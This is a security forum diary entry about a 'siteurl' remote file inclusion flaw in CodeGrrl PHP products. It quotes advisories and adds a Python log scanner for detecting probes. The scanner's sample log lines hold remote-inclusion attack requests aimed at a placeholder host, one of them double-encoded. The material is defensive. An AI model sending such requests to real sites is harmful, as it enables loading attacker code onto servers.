
SANS ISC: Remotely Exploitable CodeGrrl PHP Products File Inclusion Vulnerability SANS ISC InfoSec Forums

Remotely Exploitable CodeGrrl PHP Products File Inclusion Vulnerability
Secunia - CodeGrrl Products "siteurl" File Inclusion Vulnerability

"Successful exploitation requires that "register_globals" is enabled."

"Solution:
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".".

FrSIRT CodeGrrl Multiple Products "siteurl" Remote File Inclusion Vulnerability
"Affected Products

PHPCurrently version 2.0 and prior
PHPQuotes version 1.0 and prior
PHPCalendar version 1.0 and prior
PHPClique version 1.0 and prior
PHPFanBase version 2.1 and prior".

Patrick

Nov 14th 2005
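For anyone checking whether a site running one of these products has been probed, the following is an added example (not part of the original diary entry or of either advisory) that scans web access logs for requests where the "siteurl" parameter points at another host. It assumes Apache/nginx "combined" log format; the script paths, addresses and host names in the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address, request target and status from a "combined" format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that would send an include to another host: scheme://... or //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)
PARAM = "siteurl"  # parameter named in the advisories

# Constructed sample lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2005:10:00:00 +0000] "GET /app/index.php?siteurl=http://host.example.invalid/x.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [14/Nov/2005:10:00:05 +0000] "GET /app/index.php?id=1&SiteURL=http%253A%252F%252Fhost.example.invalid%252Fx HTTP/1.1" 200 498 "-" "-"',
    '198.51.100.7 - - [14/Nov/2005:10:01:00 +0000] "GET /app/index.php?siteurl=/app/themes HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.8 - - [14/Nov/2005:10:02:00 +0000] "GET /app/link.php?ref=http://www.example.invalid/ HTTP/1.1" 200 300 "-" "-"',
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %253A still ends up as ':'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_siteurl_inclusions(lines):
    """Return one record per request whose siteurl value names a remote host."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        target = urlsplit(m.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = decode_fully(value)
            if name.lower() == PARAM and REMOTE_RE.match(value):
                hits.append({"ip": m.group("ip"), "path": target.path,
                             "value": value, "status": int(m.group("status"))})
    return hits

if __name__ == "__main__":
    for hit in find_siteurl_inclusions(SAMPLE_LOG):
        print(hit)
```

With "register_globals" enabled the same variable can also be set from POST data or cookies, which a standard access log does not record, so an empty result here does not replace setting "register_globals" to "Off" and fixing the include.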
